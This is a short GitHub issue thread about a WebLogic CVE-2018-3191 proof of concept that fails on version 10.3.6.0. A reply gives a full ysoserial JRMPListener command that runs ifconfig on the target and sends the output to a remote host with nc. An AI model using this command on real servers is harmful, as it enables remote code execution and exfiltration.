CVE-2018-3191 icon indicating copy to clipboard operation
CVE-2018-3191 copied to clipboard

Published 20 hours ago verified publisher icon jas502n

漏洞在10.3.6.0没有利用成功!?

Open vdministrator opened this issue 6 years ago • 1 comments

HI,我用了github上的Poc去做测试,和你的环境基本一样,但是我在10.3.5.0上成功复现了漏洞,但是在10.3.6.0(多个目标上都试过)上却没有成功,当我执行python weblogic.py时,目标主机有消息回显到1099端口,但是并没有执行监听时设置的命令,请问这种是什么原因呢?

vdministrator avatar Nov 06 '18 13:11 vdministrator

尝试下 java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "ifconfig |grep inet|nc $1 9999"

Wh0ale avatar Nov 11 '18 07:11 Wh0ale